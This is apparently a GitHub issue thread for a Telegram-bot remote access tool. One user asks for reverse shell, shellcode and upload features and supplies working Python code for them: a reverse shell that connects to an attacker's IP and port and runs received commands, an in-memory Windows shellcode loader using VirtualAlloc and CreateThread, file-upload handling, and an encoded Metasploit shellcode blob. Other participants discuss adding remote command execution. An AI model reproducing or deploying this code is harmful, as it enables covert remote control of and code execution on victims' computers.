please add reverse shell and shellcode and Upload

[adastmins]

example :

import base64 import ctypes import os import re import socket import subprocess import urllib2 import pprint import sys import time

elif type_command == "shellcode": response_shellcode = execute_shellcode(argument_command) send_message(response_shellcode)

elif type_command == "reverseshell": ip, port = argument_command.split() reverse_shell(ip, port)

def parse_command(cmd): if cmd.startswith('/'):

if "shellcode " in cmd: shellcode = cmd[len('/shellcode '):] return ("shellcode", shellcode)

elif "upload" in cmd: return ("upload", "Null")

elif "reverseshell" in cmd: ip_port = cmd[len('/reverseshell '):] return ("reverseshell", ip_port)

def reverse_shell(ip, port): child_pid = os.fork()

if child_pid:
    print ip, port
    try:
        sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sockfd.connect((ip, int(port)))
        while True:
            data = sockfd.recv(1024)
            if data == "exit\n":
                sockfd.send("[!] Exiting the reverse shell.\n")
                break

            comm = subprocess.Popen(data, shell=True,
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE,
                                    stdin=subprocess.PIPE)
            STDOUT, STDERR = comm.communicate()
            sockfd.send(STDOUT)
            sockfd.send(STDERR)
    except Exception:
        pass

    sockfd.close()
    sys.exit(0)
    return  # NEVER REACHED
else:
    return

def execute_shellcode(msg): if "Windows" not in platform.system(): return "[!] Currently this functionality is only available for Windows platforms." else:

based on Debasish Mandal's "Execute ShellCode Using Python"

    # http://www.debasish.in/2012/04/execute-shellcode-using-python.html
    shellcode = bytearray(base64.b64decode(msg))

    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                              ctypes.c_int(len(shellcode)),
                                              ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                         buf,
                                         ctypes.c_int(len(shellcode)))

    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.c_int(ptr),
                                             ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.pointer(ctypes.c_int(0)))

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),
                                               ctypes.c_int(-1))

    return "[*] Shellcode (%d bytes) executed in memory." % len(shellcode)

elif type_command == "upload": send_message(uploadfunctionality_message)

elif content_type == 'document': file_id = msg['document']['file_id'] filename = msg['document']['file_name'] final_filename = filename

    if not os.path.exists('./uploads'):
        try:
            os.makedirs('./uploads')
            final_filename = './uploads/' + filename
        except OSError as err:
            err_msg = "[!] ERROR: Could not create directory ./uploads. Saving in the current directory."
            send_message(err_msg)

    bot.downloadFile(file_id, final_filename)

shellcode example only;

!/usr/bin/python

import base64

ShellCode

x86/shikata_ga_nai succeeded with size 227 (iteration=1)

Metasploit windows/exec calc.exe

raw_shellcode = bytearray( "\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9" "\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3" "\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5" "\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71" "\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0" "\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16" "\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd" "\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a" "\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93" "\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20" "\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc" "\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc" "\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda" "\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e" "\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92" "\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2" "\x5e\xa4\xb4")

shellcode = base64.b64encode(raw_shellcode) print shellcode

[mvrozanti]

Not sure if I follow. What is the point of this addition?

[Dviros]

@mvrozanti it allows an attacker to have a complete shell on the machine. It's a good addition, problem is that the RHOST and RPORT of the attacker machine needs to be embedded in the shellcode, and I'm not sure how to generate a payload by python. Search for "Metasploit Reverse Shell" in youtube, it's pretty neat.

[mvrozanti]

@Dviros I know what metasploit is. But is it really necessary? Can't we just initiate a shell session and output the stream to Telegram?

[Dviros]

Actually, you can just add "/cmd" option with just an os.command :D And reflect the output of course. Just need to handle the output correctly (ie, long messages).

[mvrozanti]

What about current directory keeping?

Like user types in a /cd command?

[Dviros]

Will need to use subprocess :\ Take a look on this code: https://github.com/buckyroberts/Turtle/blob/master/Single_Client/client.py If you'll implement it, you would only need to get the RHOST and RPORT from the user, and tell him to run the "client" on his side